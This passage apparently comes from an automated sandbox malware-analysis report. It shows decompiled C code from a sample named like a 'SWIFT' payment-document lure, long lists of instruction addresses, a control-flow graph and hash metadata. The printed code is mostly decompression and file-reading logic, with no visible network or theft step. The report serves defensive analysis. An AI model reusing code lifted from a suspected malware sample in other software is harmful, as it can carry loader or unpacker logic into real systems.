                                                                                  							_v24 = __edx;
                                                                                  							goto L83;
                                                                                  						case 0x1c:
                                                                                  							while(1) {
                                                                                  								L126:
                                                                                  								__eflags = _v104;
                                                                                  								if(_v104 == 0) {
                                                                                  									break;
                                                                                  								}
                                                                                  								__eax = _v24;
                                                                                  								__eax = _v24 - _v48;
                                                                                  								__eflags = __eax - _v120;
                                                                                  								if(__eax >= _v120) {
                                                                                  									__eax = __eax + _v120;
                                                                                  									__eflags = __eax;
                                                                                  								}
                                                                                  								__edx = _v12;
                                                                                  								__cl =  *(__edx + __eax);
                                                                                  								__eax = _v24;
                                                                                  								_v96 = __cl;
                                                                                  								 *(__edx + __eax) = __cl;
                                                                                  								__eax = __eax + 1;
                                                                                  								__edx = 0;
                                                                                  								_t420 = __eax % _v120;
                                                                                  								__eax = __eax / _v120;
                                                                                  								__edx = _t420;
                                                                                  								__eax = _v108;
                                                                                  								_v108 = _v108 + 1;
                                                                                  								_v104 = _v104 - 1;
                                                                                  								_v52 = _v52 - 1;
                                                                                  								__eflags = _v52;
                                                                                  								 *_v108 = __cl;
                                                                                  								_v24 = _t420;
                                                                                  								if(_v52 > 0) {
                                                                                  									continue;
                                                                                  								} else {
                                                                                  									L83:
                                                                                  									_v140 = 2;
                                                                                  									goto L3;
                                                                                  								}
                                                                                  							}
                                                                                  							_v140 = 0x1c;
                                                                                  							L173:
                                                                                  							_push(0x22);
                                                                                  							_pop(_t574);
                                                                                  							memcpy(_v148,  &_v140, _t574 << 2);
                                                                                  							return 0;
                                                                                  					}
                                                                                  				}
                                                                                  				L174:
                                                                                  				_t538 = _t537 | 0xffffffff;
                                                                                  				return _t538;
                                                                                  			}










































                                                                                  0x00406bc0
                                                                                  0x00406bc7
                                                                                  0x00406bcd
                                                                                  0x00406bd3
                                                                                  0x00000000
                                                                                  0x00406bd7
                                                                                  0x00406be3
                                                                                  0x00406be3
                                                                                  0x00406be3
                                                                                  0x00406bec
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406bf2
                                                                                  0x00000000
                                                                                  0x00406bf9
                                                                                  0x00406bfd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c06
                                                                                  0x00406c09
                                                                                  0x00406c0c
                                                                                  0x00406c0e
                                                                                  0x00406c10
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c16
                                                                                  0x00406c19
                                                                                  0x00406c1b
                                                                                  0x00406c1c
                                                                                  0x00406c1f
                                                                                  0x00406c21
                                                                                  0x00406c22
                                                                                  0x00406c24
                                                                                  0x00406c27
                                                                                  0x00406c2c
                                                                                  0x00406c31
                                                                                  0x00406c3a
                                                                                  0x00406c4d
                                                                                  0x00406c50
                                                                                  0x00406c59
                                                                                  0x00406c5c
                                                                                  0x00406c84
                                                                                  0x00406c84
                                                                                  0x00406c86
                                                                                  0x00406c94
                                                                                  0x00406c94
                                                                                  0x00406c98
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c88
                                                                                  0x00406c88
                                                                                  0x00406c8b
                                                                                  0x00406c8b
                                                                                  0x00406c8c
                                                                                  0x00406c8c
                                                                                  0x00000000
                                                                                  0x00406c88
                                                                                  0x00406c5e
                                                                                  0x00406c62
                                                                                  0x00406c67
                                                                                  0x00406c67
                                                                                  0x00406c70
                                                                                  0x00406c76
                                                                                  0x00406c78
                                                                                  0x00406c7b
                                                                                  0x00000000
                                                                                  0x00406c81
                                                                                  0x00406c81
                                                                                  0x00000000
                                                                                  0x00406c81
                                                                                  0x00000000
                                                                                  0x00406c9e
                                                                                  0x00406c9e
                                                                                  0x00406ca2
                                                                                  0x0040754e
                                                                                  0x00000000
                                                                                  0x0040754e
                                                                                  0x00406cab
                                                                                  0x00406cbb
                                                                                  0x00406cbe
                                                                                  0x00406cc1
                                                                                  0x00406cc1
                                                                                  0x00406cc1
                                                                                  0x00406cc4
                                                                                  0x00406cc4
                                                                                  0x00406cc8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406cca
                                                                                  0x00406ccd
                                                                                  0x00406cd0
                                                                                  0x00406cfa
                                                                                  0x00406d00
                                                                                  0x00406d07
                                                                                  0x00000000
                                                                                  0x00406d07
                                                                                  0x00406cd2
                                                                                  0x00406cd6
                                                                                  0x00406cd9
                                                                                  0x00406cde
                                                                                  0x00406cde
                                                                                  0x00406ce9
                                                                                  0x00406cef
                                                                                  0x00406cf1
                                                                                  0x00406cf4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d39
                                                                                  0x00406d3f
                                                                                  0x00406d42
                                                                                  0x00406d4f
                                                                                  0x00406d57
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d0e
                                                                                  0x00406d0e
                                                                                  0x00406d12
                                                                                  0x0040755d
                                                                                  0x00000000
                                                                                  0x0040755d
                                                                                  0x00406d1e
                                                                                  0x00406d29
                                                                                  0x00406d29
                                                                                  0x00406d29
                                                                                  0x00406d2c
                                                                                  0x00406d2f
                                                                                  0x00406d32
                                                                                  0x00406d35
                                                                                  0x00406d37
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004073ce
                                                                                  0x004073ce
                                                                                  0x004073d4
                                                                                  0x004073da
                                                                                  0x004073dd
                                                                                  0x004073e0
                                                                                  0x004073fa
                                                                                  0x004073fd
                                                                                  0x00407403
                                                                                  0x0040740e
                                                                                  0x0040740e
                                                                                  0x00407410
                                                                                  0x004073e2
                                                                                  0x004073e2
                                                                                  0x004073f1
                                                                                  0x004073f5
                                                                                  0x004073f5
                                                                                  0x00407413
                                                                                  0x0040741a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040741c
                                                                                  0x0040741c
                                                                                  0x00407420
                                                                                  0x004075cf
                                                                                  0x00000000
                                                                                  0x004075cf
                                                                                  0x0040742c
                                                                                  0x00407433
                                                                                  0x0040743b
                                                                                  0x0040743b
                                                                                  0x0040743b
                                                                                  0x0040743e
                                                                                  0x00407441
                                                                                  0x00407441
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d5f
                                                                                  0x00406d61
                                                                                  0x00406d64
                                                                                  0x00406dd5
                                                                                  0x00406dd8
                                                                                  0x00406ddb
                                                                                  0x00406de2
                                                                                  0x00406dec
                                                                                  0x00000000
                                                                                  0x00406dec
                                                                                  0x00406d66
                                                                                  0x00406d6a
                                                                                  0x00406d6d
                                                                                  0x00406d6f
                                                                                  0x00406d72
                                                                                  0x00406d75
                                                                                  0x00406d77
                                                                                  0x00406d7a
                                                                                  0x00406d7c
                                                                                  0x00406d81
                                                                                  0x00406d84
                                                                                  0x00406d87
                                                                                  0x00406d8b
                                                                                  0x00406d92
                                                                                  0x00406d95
                                                                                  0x00406d9c
                                                                                  0x00406da0
                                                                                  0x00406da8
                                                                                  0x00406da8
                                                                                  0x00406da8
                                                                                  0x00406da2
                                                                                  0x00406da2
                                                                                  0x00406da2
                                                                                  0x00406d97
                                                                                  0x00406d97
                                                                                  0x00406d97
                                                                                  0x00406dac
                                                                                  0x00406daf
                                                                                  0x00406dcd
                                                                                  0x00406dcf
                                                                                  0x00000000
                                                                                  0x00406dcf
                                                                                  0x00406db1
                                                                                  0x00406db4
                                                                                  0x00406db7
                                                                                  0x00406dba
                                                                                  0x00406dbc
                                                                                  0x00406dbc
                                                                                  0x00406dbc
                                                                                  0x00406dbf
                                                                                  0x00406dc2
                                                                                  0x00406dc4
                                                                                  0x00406dc5
                                                                                  0x00406dc8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406ffe
                                                                                  0x00407002
                                                                                  0x00407020
                                                                                  0x00407023
                                                                                  0x0040702a
                                                                                  0x0040702d
                                                                                  0x00407030
                                                                                  0x00407033
                                                                                  0x00407036
                                                                                  0x00407039
                                                                                  0x0040703b
                                                                                  0x00407042
                                                                                  0x00407043
                                                                                  0x00407045
                                                                                  0x00407048
                                                                                  0x0040704b
                                                                                  0x0040704e
                                                                                  0x0040704e
                                                                                  0x00407053
                                                                                  0x00000000
                                                                                  0x00407053
                                                                                  0x00407004
                                                                                  0x00407007
                                                                                  0x0040700a
                                                                                  0x00407014
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407068
                                                                                  0x0040706c
                                                                                  0x0040708f
                                                                                  0x00407092
                                                                                  0x00407095
                                                                                  0x0040709f
                                                                                  0x0040706e
                                                                                  0x0040706e
                                                                                  0x00407071
                                                                                  0x00407074
                                                                                  0x00407077
                                                                                  0x00407084
                                                                                  0x00407087
                                                                                  0x00407087
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070ab
                                                                                  0x004070af
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070b5
                                                                                  0x004070b9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070bf
                                                                                  0x004070c1
                                                                                  0x004070c5
                                                                                  0x004070c5
                                                                                  0x004070c8
                                                                                  0x004070cc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040711c
                                                                                  0x00407120
                                                                                  0x00407127
                                                                                  0x0040712a
                                                                                  0x0040712d
                                                                                  0x00407137
                                                                                  0x00000000
                                                                                  0x00407137
                                                                                  0x00407122
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407143
                                                                                  0x00407147
                                                                                  0x0040714e
                                                                                  0x00407151
                                                                                  0x00407154
                                                                                  0x00407149
                                                                                  0x00407149
                                                                                  0x00407149
                                                                                  0x00407157
                                                                                  0x0040715a
                                                                                  0x0040715d
                                                                                  0x0040715d
                                                                                  0x00407160
                                                                                  0x00407163
                                                                                  0x00407166
                                                                                  0x00407166
                                                                                  0x00407169
                                                                                  0x00407170
                                                                                  0x00407175
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407203
                                                                                  0x00407203
                                                                                  0x00407207
                                                                                  0x004075a5
                                                                                  0x00000000
                                                                                  0x004075a5
                                                                                  0x0040720d
                                                                                  0x00407210
                                                                                  0x00407213
                                                                                  0x00407217
                                                                                  0x0040721a
                                                                                  0x00407220
                                                                                  0x00407222
                                                                                  0x00407222
                                                                                  0x00407222
                                                                                  0x00407225
                                                                                  0x00407228
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406df8
                                                                                  0x00406df8
                                                                                  0x00406dfc
                                                                                  0x00407569
                                                                                  0x00000000
                                                                                  0x00407569
                                                                                  0x00406e02
                                                                                  0x00406e05
                                                                                  0x00406e08
                                                                                  0x00406e0c
                                                                                  0x00406e0f
                                                                                  0x00406e15
                                                                                  0x00406e17
                                                                                  0x00406e17
                                                                                  0x00406e17
                                                                                  0x00406e1a
                                                                                  0x00406e1d
                                                                                  0x00406e1d
                                                                                  0x00406e20
                                                                                  0x00406e23
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406e29
                                                                                  0x00406e2f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406e35
                                                                                  0x00406e35
                                                                                  0x00406e39
                                                                                  0x00406e3c
                                                                                  0x00406e3f
                                                                                  0x00406e42
                                                                                  0x00406e45
                                                                                  0x00406e46
                                                                                  0x00406e49
                                                                                  0x00406e4b
                                                                                  0x00406e51
                                                                                  0x00406e54
                                                                                  0x00406e57
                                                                                  0x00406e5a
                                                                                  0x00406e5d
                                                                                  0x00406e60
                                                                                  0x00406e63
                                                                                  0x00406e7f
                                                                                  0x00406e82
                                                                                  0x00406e85
                                                                                  0x00406e88
                                                                                  0x00406e8f
                                                                                  0x00406e93
                                                                                  0x00406e95
                                                                                  0x00406e99
                                                                                  0x00406e65
                                                                                  0x00406e65
                                                                                  0x00406e69
                                                                                  0x00406e71
                                                                                  0x00406e76
                                                                                  0x00406e78
                                                                                  0x00406e7a
                                                                                  0x00406e7a
                                                                                  0x00406e9c
                                                                                  0x00406ea3
                                                                                  0x00406ea6
                                                                                  0x00000000
                                                                                  0x00406eac
                                                                                  0x00000000
                                                                                  0x00406eac
                                                                                  0x00000000
                                                                                  0x00406eb1
                                                                                  0x00406eb1
                                                                                  0x00406eb5
                                                                                  0x00407575
                                                                                  0x00000000
                                                                                  0x00407575
                                                                                  0x00406ebb
                                                                                  0x00406ebe
                                                                                  0x00406ec1
                                                                                  0x00406ec5
                                                                                  0x00406ec8
                                                                                  0x00406ece
                                                                                  0x00406ed0
                                                                                  0x00406ed0
                                                                                  0x00406ed0
                                                                                  0x00406ed3
                                                                                  0x00406ed6
                                                                                  0x00406ed6
                                                                                  0x00406ed6
                                                                                  0x00406edc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406ede
                                                                                  0x00406ee1
                                                                                  0x00406ee4
                                                                                  0x00406ee7
                                                                                  0x00406eea
                                                                                  0x00406eed
                                                                                  0x00406ef0
                                                                                  0x00406ef3
                                                                                  0x00406ef6
                                                                                  0x00406ef9
                                                                                  0x00406efc
                                                                                  0x00406f14
                                                                                  0x00406f17
                                                                                  0x00406f1a
                                                                                  0x00406f1d
                                                                                  0x00406f1d
                                                                                  0x00406f20
                                                                                  0x00406f24
                                                                                  0x00406f26
                                                                                  0x00406efe
                                                                                  0x00406efe
                                                                                  0x00406f06
                                                                                  0x00406f0b
                                                                                  0x00406f0d
                                                                                  0x00406f0f
                                                                                  0x00406f0f
                                                                                  0x00406f29
                                                                                  0x00406f30
                                                                                  0x00406f33
                                                                                  0x00000000
                                                                                  0x00406f35
                                                                                  0x00000000
                                                                                  0x00406f35
                                                                                  0x00406f33
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406f75
                                                                                  0x00406f75
                                                                                  0x00406f79
                                                                                  0x00407581
                                                                                  0x00000000
                                                                                  0x00407581
                                                                                  0x00406f7f
                                                                                  0x00406f82
                                                                                  0x00406f85
                                                                                  0x00406f89
                                                                                  0x00406f8c
                                                                                  0x00406f92
                                                                                  0x00406f94
                                                                                  0x00406f94
                                                                                  0x00406f94
                                                                                  0x00406f97
                                                                                  0x00406f9a
                                                                                  0x00406f9a
                                                                                  0x00406fa0
                                                                                  0x00406f3e
                                                                                  0x00406f3e
                                                                                  0x00406f41
                                                                                  0x00000000
                                                                                  0x00406f41
                                                                                  0x00406fa2
                                                                                  0x00406fa2
                                                                                  0x00406fa5
                                                                                  0x00406fa8
                                                                                  0x00406fab
                                                                                  0x00406fae
                                                                                  0x00406fb1
                                                                                  0x00406fb4
                                                                                  0x00406fb7
                                                                                  0x00406fba
                                                                                  0x00406fbd
                                                                                  0x00406fc0
                                                                                  0x00406fd8
                                                                                  0x00406fdb
                                                                                  0x00406fde
                                                                                  0x00406fe1
                                                                                  0x00406fe1
                                                                                  0x00406fe4
                                                                                  0x00406fe8
                                                                                  0x00406fea
                                                                                  0x00406fc2
                                                                                  0x00406fc2
                                                                                  0x00406fca
                                                                                  0x00406fcf
                                                                                  0x00406fd1
                                                                                  0x00406fd3
                                                                                  0x00406fd3
                                                                                  0x00406fed
                                                                                  0x00406ff4
                                                                                  0x00406ff7
                                                                                  0x00000000
                                                                                  0x00406ff9
                                                                                  0x00000000
                                                                                  0x00406ff9
                                                                                  0x00000000
                                                                                  0x00407286
                                                                                  0x00407286
                                                                                  0x0040728a
                                                                                  0x004075b1
                                                                                  0x00000000
                                                                                  0x004075b1
                                                                                  0x00407290
                                                                                  0x00407293
                                                                                  0x00407296
                                                                                  0x0040729a
                                                                                  0x0040729d
                                                                                  0x004072a3
                                                                                  0x004072a5
                                                                                  0x004072a5
                                                                                  0x004072a5
                                                                                  0x004072a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407056
                                                                                  0x00407056
                                                                                  0x00407059
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407395
                                                                                  0x00407399
                                                                                  0x004073bb
                                                                                  0x004073be
                                                                                  0x004073c8
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x004073cb
                                                                                  0x0040739b
                                                                                  0x0040739e
                                                                                  0x004073a2
                                                                                  0x004073a5
                                                                                  0x004073a5
                                                                                  0x004073a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407452
                                                                                  0x00407456
                                                                                  0x00407474
                                                                                  0x00407474
                                                                                  0x00407474
                                                                                  0x0040747b
                                                                                  0x00407482
                                                                                  0x00407489
                                                                                  0x00407489
                                                                                  0x00000000
                                                                                  0x00407489
                                                                                  0x00407458
                                                                                  0x0040745b
                                                                                  0x0040745e
                                                                                  0x00407461
                                                                                  0x00407468
                                                                                  0x004073ac
                                                                                  0x004073ac
                                                                                  0x004073af
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407543
                                                                                  0x00407546
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040717d
                                                                                  0x0040717f
                                                                                  0x00407186
                                                                                  0x00407187
                                                                                  0x00407189
                                                                                  0x0040718c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407194
                                                                                  0x00407197
                                                                                  0x0040719a
                                                                                  0x0040719c
                                                                                  0x0040719e
                                                                                  0x0040719e
                                                                                  0x0040719f
                                                                                  0x004071a2
                                                                                  0x004071a9
                                                                                  0x004071ac
                                                                                  0x004071ba
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407490
                                                                                  0x00407490
                                                                                  0x00407493
                                                                                  0x0040749a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040749f
                                                                                  0x0040749f
                                                                                  0x004074a3
                                                                                  0x004075db
                                                                                  0x00000000
                                                                                  0x004075db
                                                                                  0x004074a9
                                                                                  0x004074ac
                                                                                  0x004074af
                                                                                  0x004074b3
                                                                                  0x004074b6
                                                                                  0x004074bc
                                                                                  0x004074be
                                                                                  0x004074be
                                                                                  0x004074be
                                                                                  0x004074c1
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c7
                                                                                  0x004074c7
                                                                                  0x004074cb
                                                                                  0x0040752b
                                                                                  0x0040752e
                                                                                  0x00407533
                                                                                  0x00407534
                                                                                  0x00407536
                                                                                  0x00407538
                                                                                  0x0040753b
                                                                                  0x00407447
                                                                                  0x00407447
                                                                                  0x00000000
                                                                                  0x00407447
                                                                                  0x004074cd
                                                                                  0x004074d3
                                                                                  0x004074d6
                                                                                  0x004074d9
                                                                                  0x004074dc
                                                                                  0x004074df
                                                                                  0x004074e2
                                                                                  0x004074e5
                                                                                  0x004074e8
                                                                                  0x004074eb
                                                                                  0x004074ee
                                                                                  0x00407507
                                                                                  0x0040750a
                                                                                  0x0040750d
                                                                                  0x00407510
                                                                                  0x00407514
                                                                                  0x00407516
                                                                                  0x00407516
                                                                                  0x00407517
                                                                                  0x0040751a
                                                                                  0x004074f0
                                                                                  0x004074f0
                                                                                  0x004074f8
                                                                                  0x004074fd
                                                                                  0x004074ff
                                                                                  0x00407502
                                                                                  0x00407502
                                                                                  0x0040751d
                                                                                  0x00407524
                                                                                  0x00000000
                                                                                  0x00407526
                                                                                  0x00000000
                                                                                  0x00407526
                                                                                  0x00000000
                                                                                  0x004071c2
                                                                                  0x004071c5
                                                                                  0x004071fb
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732e
                                                                                  0x0040732e
                                                                                  0x00407331
                                                                                  0x00407333
                                                                                  0x004075bd
                                                                                  0x00000000
                                                                                  0x004075bd
                                                                                  0x00407339
                                                                                  0x0040733c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407342
                                                                                  0x00407346
                                                                                  0x00407349
                                                                                  0x00407349
                                                                                  0x00407349
                                                                                  0x00000000
                                                                                  0x00407349
                                                                                  0x004071c7
                                                                                  0x004071c9
                                                                                  0x004071cb
                                                                                  0x004071cd
                                                                                  0x004071d0
                                                                                  0x004071d1
                                                                                  0x004071d3
                                                                                  0x004071d5
                                                                                  0x004071d8
                                                                                  0x004071db
                                                                                  0x004071f1
                                                                                  0x004071f6
                                                                                  0x0040722e
                                                                                  0x0040722e
                                                                                  0x00407232
                                                                                  0x0040725e
                                                                                  0x00407260
                                                                                  0x00407267
                                                                                  0x0040726a
                                                                                  0x0040726d
                                                                                  0x0040726d
                                                                                  0x00407272
                                                                                  0x00407272
                                                                                  0x00407274
                                                                                  0x00407277
                                                                                  0x0040727e
                                                                                  0x00407281
                                                                                  0x004072ae
                                                                                  0x004072ae
                                                                                  0x004072b1
                                                                                  0x004072b4
                                                                                  0x00407328
                                                                                  0x00407328
                                                                                  0x00407328
                                                                                  0x00000000
                                                                                  0x00407328
                                                                                  0x004072b6
                                                                                  0x004072bc
                                                                                  0x004072bf
                                                                                  0x004072c2
                                                                                  0x004072c5
                                                                                  0x004072c8
                                                                                  0x004072cb
                                                                                  0x004072ce
                                                                                  0x004072d1
                                                                                  0x004072d4
                                                                                  0x004072d7
                                                                                  0x004072f0
                                                                                  0x004072f2
                                                                                  0x004072f5
                                                                                  0x004072f6
                                                                                  0x004072f9
                                                                                  0x004072fb
                                                                                  0x004072fe
                                                                                  0x00407300
                                                                                  0x00407302
                                                                                  0x00407305
                                                                                  0x00407307
                                                                                  0x0040730a
                                                                                  0x0040730e
                                                                                  0x00407310
                                                                                  0x00407310
                                                                                  0x00407311
                                                                                  0x00407314
                                                                                  0x00407317
                                                                                  0x004072d9
                                                                                  0x004072d9
                                                                                  0x004072e1
                                                                                  0x004072e6
                                                                                  0x004072e8
                                                                                  0x004072eb
                                                                                  0x004072eb
                                                                                  0x0040731a
                                                                                  0x00407321
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x00000000
                                                                                  0x00407323
                                                                                  0x00000000
                                                                                  0x00407323
                                                                                  0x00407321
                                                                                  0x00407234
                                                                                  0x00407237
                                                                                  0x00407239
                                                                                  0x0040723c
                                                                                  0x0040723f
                                                                                  0x00407242
                                                                                  0x00407244
                                                                                  0x00407247
                                                                                  0x0040724a
                                                                                  0x0040724a
                                                                                  0x0040724d
                                                                                  0x0040724d
                                                                                  0x00407250
                                                                                  0x00407257
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x00000000
                                                                                  0x00407259
                                                                                  0x00000000
                                                                                  0x00407259
                                                                                  0x00407257
                                                                                  0x004071dd
                                                                                  0x004071e0
                                                                                  0x004071e2
                                                                                  0x004071e5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406f44
                                                                                  0x00406f44
                                                                                  0x00406f48
                                                                                  0x0040758d
                                                                                  0x00000000
                                                                                  0x0040758d
                                                                                  0x00406f4e
                                                                                  0x00406f51
                                                                                  0x00406f54
                                                                                  0x00406f57
                                                                                  0x00406f5a
                                                                                  0x00406f5d
                                                                                  0x00406f60
                                                                                  0x00406f62
                                                                                  0x00406f65
                                                                                  0x00406f68
                                                                                  0x00406f6b
                                                                                  0x00406f6d
                                                                                  0x00406f6d
                                                                                  0x00406f6d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070cf
                                                                                  0x004070cf
                                                                                  0x004070d3
                                                                                  0x00407599
                                                                                  0x00000000
                                                                                  0x00407599
                                                                                  0x004070d9
                                                                                  0x004070dc
                                                                                  0x004070df
                                                                                  0x004070e2
                                                                                  0x004070e4
                                                                                  0x004070e4
                                                                                  0x004070e4
                                                                                  0x004070e7
                                                                                  0x004070ea
                                                                                  0x004070ed
                                                                                  0x004070f0
                                                                                  0x004070f3
                                                                                  0x004070f6
                                                                                  0x004070f7
                                                                                  0x004070f9
                                                                                  0x004070f9
                                                                                  0x004070f9
                                                                                  0x004070fc
                                                                                  0x004070ff
                                                                                  0x00407102
                                                                                  0x00407105
                                                                                  0x00407105
                                                                                  0x00407105
                                                                                  0x00407108
                                                                                  0x0040710a
                                                                                  0x0040710a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040734c
                                                                                  0x0040734c
                                                                                  0x0040734c
                                                                                  0x00407350
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407356
                                                                                  0x00407359
                                                                                  0x0040735c
                                                                                  0x0040735f
                                                                                  0x00407361
                                                                                  0x00407361
                                                                                  0x00407361
                                                                                  0x00407364
                                                                                  0x00407367
                                                                                  0x0040736a
                                                                                  0x0040736d
                                                                                  0x00407370
                                                                                  0x00407373
                                                                                  0x00407374
                                                                                  0x00407376
                                                                                  0x00407376
                                                                                  0x00407376
                                                                                  0x00407379
                                                                                  0x0040737c
                                                                                  0x0040737f
                                                                                  0x00407382
                                                                                  0x00407385
                                                                                  0x00407389
                                                                                  0x0040738b
                                                                                  0x0040738e
                                                                                  0x00000000
                                                                                  0x00407390
                                                                                  0x0040710d
                                                                                  0x0040710d
                                                                                  0x00000000
                                                                                  0x0040710d
                                                                                  0x0040738e
                                                                                  0x004075c3
                                                                                  0x004075e5
                                                                                  0x004075eb
                                                                                  0x004075ed
                                                                                  0x004075f4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406bf2
                                                                                  0x004075fa
                                                                                  0x004075fa
                                                                                  0x00000000

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ebruary
                                                                                  • API String ID: 0-2749923991
                                                                                  • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                  • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                                                  • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                  • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 573 403479-4034a1 GetTickCount 574 4035d1-4035d9 call 40302e 573->574 575 4034a7-4034d2 call 4035f8 SetFilePointer 573->575 580 4035db-4035df 574->580 581 4034d7-4034e9 575->581 582 4034eb 581->582 583 4034ed-4034fb call 4035e2 581->583 582->583 586 403501-40350d 583->586 587 4035c3-4035c6 583->587 588 403513-403519 586->588 587->580 589 403544-403560 call 406bb0 588->589 590 40351b-403521 588->590 596 403562-40356a 589->596 597 4035cc 589->597 590->589 591 403523-403543 call 40302e 590->591 591->589 599 40356c-403574 call 40620a 596->599 600 40358d-403593 596->600 598 4035ce-4035cf 597->598 598->580 604 403579-40357b 599->604 600->597 601 403595-403597 600->601 601->597 603 403599-4035ac 601->603 603->581 605 4035b2-4035c1 SetFilePointer 603->605 606 4035c8-4035ca 604->606 607 40357d-403589 604->607 605->574 606->598 607->588 608 40358b 607->608 608->603
                                                                                  C-Code - Quality: 93%
                                                                                  			E00403479(intOrPtr _a4) {
                                                                                  				intOrPtr _t11;
                                                                                  				signed int _t12;
                                                                                  				void* _t14;
                                                                                  				void* _t15;
                                                                                  				long _t16;
                                                                                  				void* _t18;
                                                                                  				intOrPtr _t31;
                                                                                  				intOrPtr _t34;
                                                                                  				intOrPtr _t36;
                                                                                  				void* _t37;
                                                                                  				intOrPtr _t49;
                                                                                  
                                                                                  				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
                                                                                  				 *0x42a26c = GetTickCount() + 0x1f4;
                                                                                  				if(_t34 <= 0) {
                                                                                  					L22:
                                                                                  					E0040302E(1);
                                                                                  					return 0;
                                                                                  				}
                                                                                  				E004035F8( *0x420f04);
                                                                                  				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                                                                                  				 *0x420f00 = _t34;
                                                                                  				 *0x420ef0 = 0;
                                                                                  				while(1) {
                                                                                  					_t31 = 0x4000;
                                                                                  					_t11 =  *0x420ef8 -  *0x420f04;
                                                                                  					if(_t11 <= 0x4000) {
                                                                                  						_t31 = _t11;
                                                                                  					}
                                                                                  					_t12 = E004035E2(0x414ef0, _t31);
                                                                                  					if(_t12 == 0) {
                                                                                  						break;
                                                                                  					}
                                                                                  					 *0x420f04 =  *0x420f04 + _t31;
                                                                                  					 *0x40ce80 = 0x414ef0;
                                                                                  					 *0x40ce84 = _t31;
                                                                                  					L6:
